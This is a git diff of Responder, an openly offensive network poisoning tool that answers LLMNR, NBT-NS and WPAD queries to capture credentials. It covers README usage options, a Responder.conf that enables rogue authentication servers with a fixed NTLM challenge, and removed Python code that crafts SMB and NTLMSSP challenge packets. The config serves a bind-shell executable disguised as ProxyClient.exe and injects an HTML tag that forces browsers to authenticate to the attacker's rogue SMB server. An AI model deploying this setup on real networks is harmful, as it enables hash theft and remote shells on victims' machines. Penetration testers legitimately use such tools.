- This tool is not meant to work on Windows.
|
||||||
|
|
||||||
|
- For OSX, please note: Responder must be launched with an IP address for the -i flag (e.g. -i YOUR_IP_ADDR). There is no native support in OSX for custom interface binding. Using -i en1 will not work. Also to run Responder with the best experience, run the following as root:
|
||||||
|
|
||||||
USAGE
|
launchctl unload /System/Library/LaunchDaemons/com.apple.Kerberos.kdc.plist
|
||||||
=====
|
|
||||||
|
|
||||||
First of all, please take a look at Responder.conf and set it for your needs.
|
launchctl unload /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist
|
||||||
Running this tool:
|
|
||||||
|
|
||||||
- python Responder.py [options]
|
launchctl unload /System/Library/LaunchDaemons/com.apple.smbd.plist
|
||||||
|
|
||||||
Usage Example:
|
launchctl unload /System/Library/LaunchDaemons/com.apple.netbiosd.plist
|
||||||
|
|
||||||
python Responder.py -i 10.20.30.40 -r On -I eth0
|
## Usage ##
|
||||||
|
|
||||||
Options List:
|
First of all, please take a look at Responder.conf and tweak it for your needs.
|
||||||
|
|
||||||
-h, --help show this help message and exit.
|
Running the tool:
|
||||||
|
|
||||||
-i 10.20.30.40, --ip=10.20.30.40 The ip address to redirect the traffic to.
|
./Responder.py [options]
|
||||||
(usually yours)
|
|
||||||
|
|
||||||
-I eth0, --interface=eth0 Network interface to use
|
Typical Usage Example:
|
||||||
|
|
||||||
-b Off, --basic=Off Set this to On if you want to return a
|
./Responder.py -I eth0 -rPv
|
||||||
Basic HTTP authentication. Off will return
|
|
||||||
an NTLM authentication.
|
|
||||||
|
|
||||||
-r Off, --wredir=Off Set this to On to enable answers for netbios
|
Options:
|
||||||
wredir suffix queries. Answering to wredir
|
|
||||||
will likely break stuff on the network
|
|
||||||
(like classics 'nbns spoofer' will).
|
|
||||||
Default value is therefore set to Off.
|
|
||||||
|
|
||||||
-f Off, --fingerprint=Off This option allows you to fingerprint a
|
--version show program's version number and exit.
|
||||||
host that issued an NBT-NS or LLMNR query.
|
-h, --help show this help message and exit.
|
||||||
|
-A, --analyze Analyze mode. This option allows you to see NBT-NS,
|
||||||
-w On, --wpad=On Set this to On or Off to start/stop the WPAD rogue
|
BROWSER, LLMNR requests without responding.
|
||||||
proxy server. Default value is On
|
-I eth0, --interface=eth0
|
||||||
|
Network interface to use.
|
||||||
--lm=Off Set this to On if you want to force LM hashing
|
-b, --basic Return a Basic HTTP authentication. Default: NTLM
|
||||||
downgrade for Windows XP/2003 and earlier. Default value is Off
|
-r, --wredir Enable answers for netbios wredir suffix queries.
|
||||||
|
Answering to wredir will likely break stuff on the
|
||||||
-F Off, --ForceWpadAuth=Off Set this to On or Off to force NTLM/Basic authentication on
|
network. Default: Off
|
||||||
wpad.dat file retrieval. This might cause a login prompt in
|
-d, --NBTNSdomain Enable answers for netbios domain suffix queries.
|
||||||
some specific cases. Default value is Off
|
Answering to domain suffixes will likely break stuff
|
||||||
|
on the network. Default: Off
|
||||||
-v More verbose
|
-f, --fingerprint This option allows you to fingerprint a host that
|
||||||
|
issued an NBT-NS or LLMNR query.
|
||||||
|
-w, --wpad Start the WPAD rogue proxy server. Default value is
|
||||||
|
Off
|
||||||
|
-u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY
|
||||||
|
Upstream HTTP proxy used by the rogue WPAD Proxy for
|
||||||
|
outgoing requests (format: host:port)
|
||||||
|
-F, --ForceWpadAuth Force NTLM/Basic authentication on wpad.dat file
|
||||||
|
retrieval. This may cause a login prompt. Default:
|
||||||
|
Off
|
||||||
|
-P, --ProxyAuth Force NTLM (transparently)/Basic (prompt)
|
||||||
|
authentication for the proxy. WPAD doesn't need to
|
||||||
|
be ON. This option is highly effective when combined
|
||||||
|
with -r. Default: Off
|
||||||
|
--lm Force LM hashing downgrade for Windows XP/2003 and
|
||||||
|
earlier. Default: Off
|
||||||
|
-v, --verbose Increase verbosity.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
For more information read these posts:
|
|
||||||
http://blog.spiderlabs.com/2012/10/introducing-responder-10.html
|
|
||||||
http://blog.spiderlabs.com/2013/01/owning-windows-networks-with-responder-17.html
|
|
||||||
http://blog.spiderlabs.com/2013/02/owning-windows-network-with-responder-part-2.html
|
|
||||||
|
|
||||||
Follow our latest updates on twitter:
|
|
||||||
https://twitter.com/PythonResponder
|
|
||||||
|
|
||||||
COPYRIGHT
|
## Copyright ##
|
||||||
=========
|
|
||||||
|
|
||||||
NBT-NS/LLMNR Responder
|
NBT-NS/LLMNR Responder
|
||||||
Created by Laurent Gaffie
|
|
||||||
Copyright (C) 2013 Trustwave Holdings, Inc.
|
|
||||||
|
|
||||||
|
Responder, a network take-over set of tools created and maintained by Laurent Gaffie.
|
||||||
|
email: laurent.gaffie@gmail.com
|
||||||
This program is free software: you can redistribute it and/or modify
|
This program is free software: you can redistribute it and/or modify
|
||||||
it under the terms of the GNU General Public License as published by
|
it under the terms of the GNU General Public License as published by
|
||||||
the Free Software Foundation, either version 3 of the License, or
|
the Free Software Foundation, either version 3 of the License, or
|
||||||
@@ -184,4 +177,4 @@ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|||||||
GNU General Public License for more details.
|
GNU General Public License for more details.
|
||||||
|
|
||||||
You should have received a copy of the GNU General Public License
|
You should have received a copy of the GNU General Public License
|
||||||
along with this program. If not, see <http://www.gnu.org/licenses/>
|
along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
|||||||
110
Responder.conf
110
Responder.conf
@@ -1,55 +1,93 @@
|
|||||||
[Responder Core]
|
[Responder Core]
|
||||||
;;
|
|
||||||
;Set these values to On or Off, so you can control which rogue authentication server is turned on.
|
; Servers to start
|
||||||
SQL = On
|
SQL = On
|
||||||
SMB = On
|
SMB = On
|
||||||
|
Kerberos = On
|
||||||
FTP = On
|
FTP = On
|
||||||
POP = On
|
POP = On
|
||||||
;;Listen on 25/TCP, 587/TCP
|
|
||||||
SMTP = On
|
SMTP = On
|
||||||
IMAP = On
|
IMAP = On
|
||||||
HTTP = On
|
HTTP = On
|
||||||
HTTPS = On
|
HTTPS = On
|
||||||
DNS = On
|
DNS = On
|
||||||
LDAP = On
|
LDAP = On
|
||||||
;
|
|
||||||
;Set a custom challenge
|
; Custom challenge
|
||||||
Challenge = 1122334455667788
|
Challenge = 1122334455667788
|
||||||
;
|
|
||||||
;Set this to change the default logging file
|
; SQLite Database file
|
||||||
|
; Delete this file to re-capture previously captured hashes
|
||||||
|
Database = Responder.db
|
||||||
|
|
||||||
|
; Default log file
|
||||||
SessionLog = Responder-Session.log
|
SessionLog = Responder-Session.log
|
||||||
;
|
|
||||||
;Set this options with your in-scope targets. Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
|
; Poisoners log
|
||||||
;RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
|
PoisonersLog = Poisoners-Session.log
|
||||||
|
|
||||||
|
; Analyze mode log
|
||||||
|
AnalyzeLog = Analyzer-Session.log
|
||||||
|
|
||||||
|
; Dump Responder Config log:
|
||||||
|
ResponderConfigDump = Config-Responder.log
|
||||||
|
|
||||||
|
; Specific IP Addresses to respond to (default = All)
|
||||||
|
; Example: RespondTo = 10.20.1.100-150, 10.20.3.10
|
||||||
RespondTo =
|
RespondTo =
|
||||||
;
|
|
||||||
|
; Specific NBT-NS/LLMNR names to respond to (default = All)
|
||||||
|
; Example: RespondTo = WPAD, DEV, PROD, SQLINT
|
||||||
|
RespondToName =
|
||||||
|
|
||||||
|
; Specific IP Addresses not to respond to (default = None)
|
||||||
|
; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10
|
||||||
|
DontRespondTo =
|
||||||
|
|
||||||
|
; Specific NBT-NS/LLMNR names not to respond to (default = None)
|
||||||
|
; Example: DontRespondTo = NAC, IPS, IDS
|
||||||
|
DontRespondToName = ISATAP
|
||||||
|
|
||||||
|
; If set to On, we will stop answering further requests from a host
|
||||||
|
; if a hash hash been previously captured for this host.
|
||||||
|
AutoIgnoreAfterSuccess = Off
|
||||||
|
|
||||||
|
; If set to On, we will send ACCOUNT_DISABLED when the client tries
|
||||||
|
; to authenticate for the first time to try to get different credentials.
|
||||||
|
; This may break file serving and is useful only for hash capture
|
||||||
|
CaptureMultipleCredentials = On
|
||||||
|
|
||||||
[HTTP Server]
|
[HTTP Server]
|
||||||
;;
|
|
||||||
;Set this to On if you want to always serve a specific file to the victim.
|
; Set to On to always serve the custom EXE
|
||||||
Serve-Always = Off
|
Serve-Always = Off
|
||||||
;
|
|
||||||
;Set this to On if you want to serve an executable file each time a .exe is detected in an URL.
|
; Set to On to replace any requested .exe with the custom EXE
|
||||||
Serve-Exe = Off
|
Serve-Exe = Off
|
||||||
;
|
|
||||||
;Uncomment and specify a custom file to serve, the file must exist.
|
; Set to On to serve the custom HTML if the URL does not contain .exe
|
||||||
Filename = Denied.html
|
; Set to Off to inject the 'HTMLToInject' in web pages instead
|
||||||
;
|
Serve-Html = Off
|
||||||
;Specify a custom executable file to serve, the file must exist.
|
|
||||||
ExecFilename = FixInternet.exe
|
; Custom HTML to serve
|
||||||
;
|
HtmlFilename = files/AccessDenied.html
|
||||||
;Set your custom PAC script
|
|
||||||
WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
|
; Custom EXE File to serve
|
||||||
;
|
ExeFilename = files/BindShell.exe
|
||||||
;HTML answer to inject.
|
|
||||||
;In this example, we redirect the browser to our rogue SMB server. Please consider the "RespProxySrv" string when modifying, it is used in conjunction with WPADScript so no proxy will be used for this host.
|
; Name of the downloaded .exe that the client will see
|
||||||
;Also, the HTML has to be in this format "<html> Payload goes here...</html>".
|
ExeDownloadName = ProxyClient.exe
|
||||||
HTMLToServe = <html><head></head><body><img src='file:\\\\\RespProxySrv\ssed\seyad.ico' alt='Loading' height='1' width='2'></body></html>
|
|
||||||
;
|
; Custom WPAD Script
|
||||||
|
WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "ProxySrv")||shExpMatch(host, "(*.ProxySrv|ProxySrv)")) return "DIRECT"; return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141; DIRECT';}
|
||||||
|
|
||||||
|
; HTML answer to inject in HTTP responses (before </body> tag).
|
||||||
|
; Set to an empty string to disable.
|
||||||
|
; In this example, we redirect make users' browsers issue a request to our rogue SMB server.
|
||||||
|
HTMLToInject = <img src='file://RespProxySrv/pictures/logo.jpg' alt='Loading' height='1' width='1'>
|
||||||
|
|
||||||
[HTTPS Server]
|
[HTTPS Server]
|
||||||
;
|
|
||||||
;Change to use your certs
|
|
||||||
cert = Certs/responder.crt
|
|
||||||
key = Certs/responder.key
|
|
||||||
;
|
|
||||||
|
|
||||||
|
|
||||||
|
; Configure SSL Certificates to use
|
||||||
|
SSLCert = certs/responder.crt
|
||||||
|
SSLKey = certs/responder.key
|
||||||
|
|||||||
2321
Responder.py
2321
Responder.py
File diff suppressed because it is too large
Load Diff
398
SMBPackets.py
398
SMBPackets.py
@@ -1,398 +0,0 @@
|
|||||||
#! /usr/bin/env python
|
|
||||||
# NBT-NS/LLMNR Responder
|
|
||||||
# Created by Laurent Gaffie
|
|
||||||
# Copyright (C) 2014 Trustwave Holdings, Inc.
|
|
||||||
#
|
|
||||||
# This program is free software: you can redistribute it and/or modify
|
|
||||||
# it under the terms of the GNU General Public License as published by
|
|
||||||
# the Free Software Foundation, either version 3 of the License, or
|
|
||||||
# (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful,
|
|
||||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
||||||
# GNU General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
||||||
import struct
|
|
||||||
from odict import OrderedDict
|
|
||||||
|
|
||||||
class Packet():
|
|
||||||
fields = OrderedDict([
|
|
||||||
("data", ""),
|
|
||||||
])
|
|
||||||
def __init__(self, **kw):
|
|
||||||
self.fields = OrderedDict(self.__class__.fields)
|
|
||||||
for k,v in kw.items():
|
|
||||||
if callable(v):
|
|
||||||
self.fields[k] = v(self.fields[k])
|
|
||||||
else:
|
|
||||||
self.fields[k] = v
|
|
||||||
def __str__(self):
|
|
||||||
return "".join(map(str, self.fields.values()))
|
|
||||||
|
|
||||||
#Calculate total SMB packet len.
|
|
||||||
def longueur(payload):
|
|
||||||
length = struct.pack(">i", len(''.join(payload)))
|
|
||||||
return length
|
|
||||||
|
|
||||||
#Set MID SMB Header field.
|
|
||||||
def midcalc(data):
|
|
||||||
pack=data[34:36]
|
|
||||||
return pack
|
|
||||||
|
|
||||||
#Set UID SMB Header field.
|
|
||||||
def uidcalc(data):
|
|
||||||
pack=data[32:34]
|
|
||||||
return pack
|
|
||||||
|
|
||||||
#Set PID SMB Header field.
|
|
||||||
def pidcalc(data):
|
|
||||||
pack=data[30:32]
|
|
||||||
return pack
|
|
||||||
|
|
||||||
#Set TID SMB Header field.
|
|
||||||
def tidcalc(data):
|
|
||||||
pack=data[28:30]
|
|
||||||
return pack
|
|
||||||
|
|
||||||
|
|
||||||
##################################################################################
|
|
||||||
class SMBHeader(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("proto", "\xff\x53\x4d\x42"),
|
|
||||||
("cmd", "\x72"),
|
|
||||||
("errorcode", "\x00\x00\x00\x00" ),
|
|
||||||
("flag1", "\x00"),
|
|
||||||
("flag2", "\x00\x00"),
|
|
||||||
("pidhigh", "\x00\x00"),
|
|
||||||
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
||||||
("reserved", "\x00\x00"),
|
|
||||||
("tid", "\x00\x00"),
|
|
||||||
("pid", "\x00\x00"),
|
|
||||||
("uid", "\x00\x00"),
|
|
||||||
("mid", "\x00\x00"),
|
|
||||||
])
|
|
||||||
##################################################################################
|
|
||||||
#SMB Negotiate Answer LM packet.
|
|
||||||
class SMBNegoAnsLM(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Wordcount", "\x11"),
|
|
||||||
("Dialect", ""),
|
|
||||||
("Securitymode", "\x03"),
|
|
||||||
("MaxMpx", "\x32\x00"),
|
|
||||||
("MaxVc", "\x01\x00"),
|
|
||||||
("Maxbuffsize", "\x04\x41\x00\x00"),
|
|
||||||
("Maxrawbuff", "\x00\x00\x01\x00"),
|
|
||||||
("Sessionkey", "\x00\x00\x00\x00"),
|
|
||||||
("Capabilities", "\xfc\x3e\x01\x00"),
|
|
||||||
("Systemtime", "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
|
|
||||||
("Srvtimezone", "\x2c\x01"),
|
|
||||||
("Keylength", "\x08"),
|
|
||||||
("Bcc", "\x10\x00"),
|
|
||||||
("Key", ""),
|
|
||||||
("Domain", "SMB"),
|
|
||||||
("DomainNull", "\x00\x00"),
|
|
||||||
("Server", "SMB-TOOLKIT"),
|
|
||||||
("ServerNull", "\x00\x00"),
|
|
||||||
])
|
|
||||||
|
|
||||||
def calculate(self):
|
|
||||||
##Convert first..
|
|
||||||
self.fields["Domain"] = self.fields["Domain"].encode('utf-16le')
|
|
||||||
self.fields["Server"] = self.fields["Server"].encode('utf-16le')
|
|
||||||
##Then calculate.
|
|
||||||
CompleteBCCLen = str(self.fields["Key"])+str(self.fields["Domain"])+str(self.fields["DomainNull"])+str(self.fields["Server"])+str(self.fields["ServerNull"])
|
|
||||||
self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen))
|
|
||||||
self.fields["Keylength"] = struct.pack("<h",len(self.fields["Key"]))[0]
|
|
||||||
##################################################################################
|
|
||||||
#SMB Negotiate Answer LM packet.
|
|
||||||
class SMBNegoAns(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Wordcount", "\x11"),
|
|
||||||
("Dialect", ""),
|
|
||||||
("Securitymode", "\x03"),
|
|
||||||
("MaxMpx", "\x32\x00"),
|
|
||||||
("MaxVc", "\x01\x00"),
|
|
||||||
("MaxBuffSize", "\x04\x41\x00\x00"),
|
|
||||||
("MaxRawBuff", "\x00\x00\x01\x00"),
|
|
||||||
("SessionKey", "\x00\x00\x00\x00"),
|
|
||||||
("Capabilities", "\xfd\xf3\x01\x80"),
|
|
||||||
("SystemTime", "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
|
|
||||||
("SrvTimeZone", "\xf0\x00"),
|
|
||||||
("KeyLen", "\x00"),
|
|
||||||
("Bcc", "\x57\x00"),
|
|
||||||
("Guid", "\xc8\x27\x3d\xfb\xd4\x18\x55\x4f\xb2\x40\xaf\xd7\x61\x73\x75\x3b"),
|
|
||||||
("InitContextTokenASNId", "\x60"),
|
|
||||||
("InitContextTokenASNLen", "\x5b"),
|
|
||||||
("ThisMechASNId", "\x06"),
|
|
||||||
("ThisMechASNLen", "\x06"),
|
|
||||||
("ThisMechASNStr", "\x2b\x06\x01\x05\x05\x02"),
|
|
||||||
("SpNegoTokenASNId", "\xA0"),
|
|
||||||
("SpNegoTokenASNLen", "\x51"),
|
|
||||||
("NegTokenASNId", "\x30"),
|
|
||||||
("NegTokenASNLen", "\x4f"),
|
|
||||||
("NegTokenTag0ASNId", "\xA0"),
|
|
||||||
("NegTokenTag0ASNLen", "\x30"),
|
|
||||||
("NegThisMechASNId", "\x30"),
|
|
||||||
("NegThisMechASNLen", "\x2e"),
|
|
||||||
("NegThisMech4ASNId", "\x06"),
|
|
||||||
("NegThisMech4ASNLen", "\x09"),
|
|
||||||
("NegThisMech4ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
|
|
||||||
("NegTokenTag3ASNId", "\xA3"),
|
|
||||||
("NegTokenTag3ASNLen", "\x1b"),
|
|
||||||
("NegHintASNId", "\x30"),
|
|
||||||
("NegHintASNLen", "\x19"),
|
|
||||||
("NegHintTag0ASNId", "\xa0"),
|
|
||||||
("NegHintTag0ASNLen", "\x17"),
|
|
||||||
("NegHintFinalASNId", "\x1b"),
|
|
||||||
("NegHintFinalASNLen", "\x15"),
|
|
||||||
("NegHintFinalASNStr", "server2008$@SMB.LOCAL"),
|
|
||||||
## END
|
|
||||||
|
|
||||||
])
|
|
||||||
|
|
||||||
def calculate(self):
|
|
||||||
|
|
||||||
CompleteBCCLen1 = str(self.fields["Guid"])+str(self.fields["InitContextTokenASNId"])+str(self.fields["InitContextTokenASNLen"])+str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
|
|
||||||
|
|
||||||
AsnLenStart = str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
|
|
||||||
|
|
||||||
AsnLen2 = str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
|
|
||||||
|
|
||||||
MechTypeLen = str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])
|
|
||||||
|
|
||||||
Tag3Len = str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
|
|
||||||
|
|
||||||
self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen1))
|
|
||||||
self.fields["InitContextTokenASNLen"] = struct.pack("<B", len(AsnLenStart))
|
|
||||||
self.fields["ThisMechASNLen"] = struct.pack("<B", len(str(self.fields["ThisMechASNStr"])))
|
|
||||||
self.fields["SpNegoTokenASNLen"] = struct.pack("<B", len(AsnLen2))
|
|
||||||
self.fields["NegTokenASNLen"] = struct.pack("<B", len(AsnLen2)-2)
|
|
||||||
self.fields["NegTokenTag0ASNLen"] = struct.pack("<B", len(MechTypeLen))
|
|
||||||
self.fields["NegThisMechASNLen"] = struct.pack("<B", len(MechTypeLen)-2)
|
|
||||||
self.fields["NegThisMech4ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech4ASNStr"])))
|
|
||||||
self.fields["NegTokenTag3ASNLen"] = struct.pack("<B", len(Tag3Len))
|
|
||||||
self.fields["NegHintASNLen"] = struct.pack("<B", len(Tag3Len)-2)
|
|
||||||
self.fields["NegHintTag0ASNLen"] = struct.pack("<B", len(Tag3Len)-4)
|
|
||||||
self.fields["NegHintFinalASNLen"] = struct.pack("<B", len(str(self.fields["NegHintFinalASNStr"])))
|
|
||||||
|
|
||||||
################################################################################
|
|
||||||
|
|
||||||
class SMBSession1Data(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Wordcount", "\x04"),
|
|
||||||
("AndXCommand", "\xff"),
|
|
||||||
("Reserved", "\x00"),
|
|
||||||
("Andxoffset", "\x5f\x01"),
|
|
||||||
("Action", "\x00\x00"),
|
|
||||||
("SecBlobLen", "\xea\x00"),
|
|
||||||
("Bcc", "\x34\x01"),
|
|
||||||
("ChoiceTagASNId", "\xa1"),
|
|
||||||
("ChoiceTagASNLenOfLen", "\x81"),
|
|
||||||
("ChoiceTagASNIdLen", "\x00"),
|
|
||||||
("NegTokenTagASNId", "\x30"),
|
|
||||||
("NegTokenTagASNLenOfLen","\x81"),
|
|
||||||
("NegTokenTagASNIdLen", "\x00"),
|
|
||||||
("Tag0ASNId", "\xA0"),
|
|
||||||
("Tag0ASNIdLen", "\x03"),
|
|
||||||
("NegoStateASNId", "\x0A"),
|
|
||||||
("NegoStateASNLen", "\x01"),
|
|
||||||
("NegoStateASNValue", "\x01"),
|
|
||||||
("Tag1ASNId", "\xA1"),
|
|
||||||
("Tag1ASNIdLen", "\x0c"),
|
|
||||||
("Tag1ASNId2", "\x06"),
|
|
||||||
("Tag1ASNId2Len", "\x0A"),
|
|
||||||
("Tag1ASNId2Str", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
|
|
||||||
("Tag2ASNId", "\xA2"),
|
|
||||||
("Tag2ASNIdLenOfLen", "\x81"),
|
|
||||||
("Tag2ASNIdLen", "\xED"),
|
|
||||||
("Tag3ASNId", "\x04"),
|
|
||||||
("Tag3ASNIdLenOfLen", "\x81"),
|
|
||||||
("Tag3ASNIdLen", "\xEA"),
|
|
||||||
("NTLMSSPSignature", "NTLMSSP"),
|
|
||||||
("NTLMSSPSignatureNull", "\x00"),
|
|
||||||
("NTLMSSPMessageType", "\x02\x00\x00\x00"),
|
|
||||||
("NTLMSSPNtWorkstationLen","\x1e\x00"),
|
|
||||||
("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
|
|
||||||
("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
|
|
||||||
("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
|
|
||||||
("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"),
|
|
||||||
("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
||||||
("NTLMSSPNtTargetInfoLen","\x94\x00"),
|
|
||||||
("NTLMSSPNtTargetInfoMaxLen","\x94\x00"),
|
|
||||||
("NTLMSSPNtTargetInfoBuffOffset","\x56\x00\x00\x00"),
|
|
||||||
("NegTokenInitSeqMechMessageVersionHigh","\x05"),
|
|
||||||
("NegTokenInitSeqMechMessageVersionLow","\x02"),
|
|
||||||
("NegTokenInitSeqMechMessageVersionBuilt","\xce\x0e"),
|
|
||||||
("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"),
|
|
||||||
("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"),
|
|
||||||
("NTLMSSPNtWorkstationName","SMB12"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairsId","\x02\x00"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairsLen","\x0a\x00"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairsUnicodeStr","smb12"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs1Id","\x01\x00"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs1Len","\x1e\x00"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs1UnicodeStr","SERVER2008"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs2Id","\x04\x00"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs2Len","\x1e\x00"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs2UnicodeStr","smb12.local"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs3Id","\x03\x00"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs3Len","\x1e\x00"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs3UnicodeStr","SERVER2008.smb12.local"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs5Id","\x05\x00"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs5Len","\x04\x00"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs5UnicodeStr","smb12.local"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs6Id","\x00\x00"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs6Len","\x00\x00"),
|
|
||||||
("NTLMSSPNTLMPadding", ""),
|
|
||||||
("NativeOs","Windows Server 2003 3790 Service Pack 2"),
|
|
||||||
("NativeOsTerminator","\x00\x00"),
|
|
||||||
("NativeLAN", "Windows Server 2003 5.2"),
|
|
||||||
("NativeLANTerminator","\x00\x00"),
|
|
||||||
])
|
|
||||||
|
|
||||||
|
|
||||||
def calculate(self):
|
|
||||||
|
|
||||||
##Convert strings to Unicode first...
|
|
||||||
self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le')
|
|
||||||
self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le')
|
|
||||||
self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le')
|
|
||||||
self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le')
|
|
||||||
self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le')
|
|
||||||
self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le')
|
|
||||||
self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le')
|
|
||||||
self.fields["NativeLAN"] = self.fields["NativeLAN"].encode('utf-16le')
|
|
||||||
|
|
||||||
###### SecBlobLen Calc:
|
|
||||||
